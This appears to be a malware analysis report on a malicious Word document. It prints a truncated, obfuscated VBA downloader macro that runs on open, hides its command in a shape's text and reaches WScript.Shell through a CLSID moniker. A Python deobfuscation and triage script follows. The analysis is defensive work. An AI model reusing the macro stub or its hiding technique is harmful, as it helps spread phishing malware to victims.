Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1566.001 (Phishing: Spearphishing Attachment)
The sample is a malicious Office document carrying VBA macros: a Document_Open auto-execution procedure that instantiates a COM object through GetObject. The macro is heavily obfuscated with filler arithmetic and Select Case blocks that assign variables nobody reads, but only three statements do real work: it looks up a shape named clSUStuE, reads that shape's text (Shapes("clSUStuE").TextFrame.TextRange.Text), and creates an object by CLSID moniker, GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8"), where that CLSID is WScript.Shell. The command string therefore lives in the shape's text, not in the extracted macro source, so the second-stage URL is not visible in this report; the only extracted URL is the DrawingML schema namespace, which is benign. Taken together (auto-exec trigger, payload hidden in a document shape, WScript.Shell obtained without naming it), the structure is that of a macro downloader, the kind commonly delivered as a spearphishing attachment; the download-and-execute intent is inferred from this structure rather than from a recovered command.
Heuristics (6)

- ClamAV: Doc.Downloader.00536d-6764533-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.00536d-6764533-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open auto-execution macro present
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call present (here used with a "new:" CLSID moniker rather than a ProgID)
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: The compiled VBA (p-code/cache stream) contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, and documents whose source extraction fails, where no visible source is available.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML namespace URI, present in any document that contains drawing shapes; it is neither an indicator of compromise nor the payload URL.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6541 bytes |

SHA-256 (macros.bas): 2c5429eddf131d2d150fcc79fabc901c055a84fe2691f1c8bb009a6e788e66b3
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "awkKfQhhBIljln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
cGrOkH = (FCXnBVTT - Oct(mwNrWfWCw) * Obbwt - Sgn(312578752) - 72815590 + Fix(SbVwa) + 479906409 + 7405951 / 99920874 / aHJHMSnwi)
Select Case Trwjo
Case 101059272
tJiFisqM = CLng(9861119)
cqVFqHowv = Int(zBJozOlr)
Case 109699647
rhjvNrk = Hex(248736072)
PSuKaKGJE = CStr(194450204 * CByte(Intahrzq))
End Select
On Error Resume Next
zhXlRiRmz = (SWluk - Oct(JHfnB) * wWwbMuuzX - Sgn(156301923) - 172810723 + Fix(MOzzsA) + 83087439 + 54104109 / 226311383 / VmbSqF)
Select Case MLVsBlBnp
Case 119426645
rwduwZi = CLng(141134382)
MPfmtN = Int(ALAtDpAK)
Case 80917060
SKdvK = Hex(19461991)
iQknbqCj = CStr(140289408 * CByte(nzjjzoGBb))
End Select
On Error Resume Next
irPzUj = (PAwviw - Oct(OizLa) * WJNuPb - Sgn(136632580) - 197795734 + Fix(dTWpF) + 2117839469 + 119227446 / 142792163 / ubYnRM)
Select Case ztPqPV
Case 329066177
loYdU = CLng(225335282)
LjNWfYsqc = Int(JdQzvjrBc)
Case 108819769
FnmIVQDR = Hex(49921568)
BmBPpZvh = CStr(299703831 * CByte(DmtFr))
End Select
Set Hzwjzv = Shapes("clSUStuE")
On Error Resume Next
TCTKaSa = (RMSQIMwN - Oct(MhSjU) * FElfI - Sgn(162401051) - 286707951 + Fix(MLFDEuQV) + 440961519 + 311995130 / 328566021 / TvRiK)
Select Case vttAVvzt
Case 88176039
omSIa = CLng(199109978)
FDIsS = Int(raXlLoKmH)
Case 140636773
dzpMqJ = Hex(23626566)
hLjUd = CStr(270023892 * CByte(pqMbBwcA))
End Select
On Error Resume Next
PTvIDMWG = (WSYDDMG - Oct(wWUiSG) * aCjVaj - Sgn(126378074) - 149716647 + Fix(hiLfGtWq) + 1663849069 + 237966589 / 237940694 / pAaoKzQ)
Select Case GDzNfiAd
Case 4029929
wDvqWUA = CLng(177665037)
CziJi = Int(tlCIjQj)
Case 17092630
bilwAYtt = Hex(274382865)
njawiFnjo = CStr(95039379 * CByte(cuOrmzwU))
End Select
fTjnCb = "" + Gtwcz + JoFDShQw + psPtFhl + fTXBwnn + Hzwjzv.TextFrame.TextRange.Text + PFisz + JFAzwhw
On Error Resume Next
oGmjifQ = (ZoHMODZT - Oct(BFljFm) * MoOwMHw - Sgn(345518) - 200327392 + Fix(JRWaz) + 1110929759 + 26569162 / 334387903 / Prjltj)
Select Case LYsHpiTI
Case 154496220
QTcSrHhK = CLng(304215558)
ztCoh = Int(sXlcDUQc)
Case 318729389
HXOazND = Hex(69703226)
kWvXkBbzX = CStr(255602424 * CByte(WDZEqw))
End Select
On Error Resume Next
jbEiHNzW = (HzuhEXD - Oct(WOwdwS) * ADDWpEo - Sgn(162873545) - 191718303 + Fix(UMbFp) + 1855249139 + 311957702 / 301088301 / YziBiAOk)
Select Case zdJlJjh
Case 21861827
cjWTa = CLng(112164751)
jLbKhmBj = Int(tZSBZ)
Case 143173573
TJYzsjC = Hex(310345048)
lSSMRFY = CStr(112835471 * CByte(upnZwNc))
End Select
On Error Resume Next
biPdq = (zWSKbLKrQ - Oct(NmjLthTlP) * XuRkwpfmD - Sgn(157193244) - 264996091 + Fix(TrCTpO) + 1865253409 + 141167999 / 80036364 / nndtwAJt)
Select Case dNzVCE
Case 224159898
mfXnsI = CLng(296846718)
rIarEJ = Int(joHdGCsfd)
Case 62560049
KGVVzO = Hex(51396590)
qqouuikaF = CStr(290518562 * CByte(BGUTRjvb))
End Select
Set ijOMk = CVar(GetObject(PHPBkGF + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + KBRmA))
On Error Resume Next
wquTr = (siKmXQ - Oct(tdBvjwh) * ISdRa - Sgn(85315354) - 212922179 + Fix(ObkpGwjFQ) + 215589959 + 87409329 / 92439367 / sGWmE)
Select Case d
```

... (truncated)
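The following Python script is an added triage example for the extracted macro above; it is not part of the analyzer, of ClamAV or of oletools. It does two things the report's heuristics describe: it emulates the OLE_VBA_PCODE_AUTOEXEC_EXEC logic on decoded source (an auto-execution token co-occurring with execution tokens, with "new:" CLSID monikers resolved against a small lookup table), and it strips the filler by dead-store elimination, dropping every assignment whose target is never read anywhere else and whose right-hand side uses only side-effect-free functions, then removing Select Case blocks that are left with nothing but Case labels. The SAMPLE string is a constructed excerpt of the preview (its live statements plus two filler blocks); KNOWN_CLSIDS and FILLER_FUNCS are this example's own tables, with only the WScript.Shell CLSID that this sample uses populated.

```python
import re
from collections import Counter

# Constructed excerpt of the extracted macros.bas: the three live statements
# from the report's preview plus two of its filler blocks. Not the full sample.
SAMPLE = '''Private Sub Document_open()
On Error Resume Next
cGrOkH = (FCXnBVTT - Oct(mwNrWfWCw) * Obbwt - Sgn(312578752) - 72815590 + Fix(SbVwa) + 479906409 + 7405951 / 99920874 / aHJHMSnwi)
Select Case Trwjo
Case 101059272
tJiFisqM = CLng(9861119)
cqVFqHowv = Int(zBJozOlr)
Case 109699647
rhjvNrk = Hex(248736072)
PSuKaKGJE = CStr(194450204 * CByte(Intahrzq))
End Select
Set Hzwjzv = Shapes("clSUStuE")
On Error Resume Next
PTvIDMWG = (WSYDDMG - Oct(wWUiSG) * aCjVaj - Sgn(126378074) - 149716647 + Fix(hiLfGtWq) + 1663849069 + 237966589 / 237940694 / pAaoKzQ)
fTjnCb = "" + Gtwcz + JoFDShQw + psPtFhl + fTXBwnn + Hzwjzv.TextFrame.TextRange.Text + PFisz + JFAzwhw
Set ijOMk = CVar(GetObject(PHPBkGF + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + KBRmA))
End Sub
'''

# Example lookup table (this script's own, not the analyzer's): CLSIDs seen
# behind the "new:" moniker. Only the one this sample uses is listed.
KNOWN_CLSIDS = {"72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell"}

# VBA functions without side effects; an assignment built only from these and
# from names nobody reads is padding. Assumed list, extend as needed.
FILLER_FUNCS = {"oct", "hex", "sgn", "fix", "int", "abs", "clng", "cint",
                "cbyte", "cdbl", "cstr"}

IDENT = re.compile(r"[A-Za-z_]\w*")
STRING = re.compile(r'"[^"]*"')
ASSIGN = re.compile(r"^\s*(Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$", re.I)
CALL = re.compile(r"([A-Za-z_]\w*)\s*\(")
AUTOEXEC = re.compile(r"\b(Document_Open|Document_Close|AutoOpen|Auto_Open|AutoExec|AutoClose|Workbook_Open)\b", re.I)
EXEC_TOKENS = re.compile(r"\b(GetObject|CreateObject|Shell|ShellExecute|WScript\.Shell|URLDownloadToFile|XMLHTTP|ADODB\.Stream)\b", re.I)
MONIKER = re.compile(r"new:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})")
SHAPE_READ = re.compile(r'Shapes\("([^"]+)"\)')


def _is_filler_expr(rhs):
    """Expression made only of literals, operators, names and side-effect-free calls."""
    if '"' in rhs or "." in rhs:  # string literal or member access: real work
        return False
    return all(f.lower() in FILLER_FUNCS for f in CALL.findall(rhs))


def strip_dead_stores(lines):
    """Drop filler assignments whose target is never read on any other line, to a fixed point."""
    changed = True
    while changed:
        changed = False
        reads = Counter(t.lower() for l in lines for t in IDENT.findall(STRING.sub('""', l)))
        kept = []
        for line in lines:
            m = ASSIGN.match(line)
            if m and reads[m.group(2).lower()] == 1 and _is_filler_expr(m.group(3)):
                changed = True  # only occurrence is its own assignment: dead store
                continue
            kept.append(line)
        lines = kept
    return lines


def drop_empty_blocks(lines):
    """Remove Select Case blocks holding only Case labels, and repeated On Error Resume Next."""
    out, i, seen_on_error = [], 0, False
    while i < len(lines):
        low = lines[i].strip().lower()
        if low.startswith("select case"):
            j = i + 1
            while j < len(lines) and lines[j].strip().lower() != "end select":
                j += 1
            body = lines[i + 1:j]
            if j < len(lines) and all(b.strip().lower().startswith("case ") for b in body):
                i = j + 1  # skip the whole hollow block
                continue
        if low == "on error resume next":
            if seen_on_error:
                i += 1
                continue
            seen_on_error = True
        out.append(lines[i])
        i += 1
    return out


def effective_lines(src):
    """Return the statements that survive filler removal."""
    lines = [l.rstrip() for l in src.strip().splitlines()]
    return drop_empty_blocks(strip_dead_stores(lines))


def triage(src):
    """Auto-exec + execution-token check, CLSID moniker resolution, and the reduced macro."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)}, key=str.lower)
    exec_tokens = sorted({m.group(1) for m in EXEC_TOKENS.finditer(src)}, key=str.lower)
    clsids = {c.upper(): KNOWN_CLSIDS.get(c.upper(), "unknown CLSID") for c in MONIKER.findall(src)}
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "clsids": clsids,
        "shape_sources": SHAPE_READ.findall(src),
        "autoexec_with_exec": bool(autoexec) and bool(exec_tokens or clsids),
        "effective_lines": effective_lines(src),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, "->", value)
```

On the excerpt the reduction leaves six lines: the Sub header, one On Error Resume Next, the Shapes("clSUStuE") lookup, the concatenation that reads the shape text, the GetObject("new:...") call and End Sub. The padding identifiers around the shape text (Gtwcz, JoFDShQw, ...) are never assigned, so in VBA they are Empty and contribute nothing to the string; the concatenation evaluates to the shape's text alone. Recovering the actual command therefore means pulling the text of that shape out of the document itself, which this report does not include.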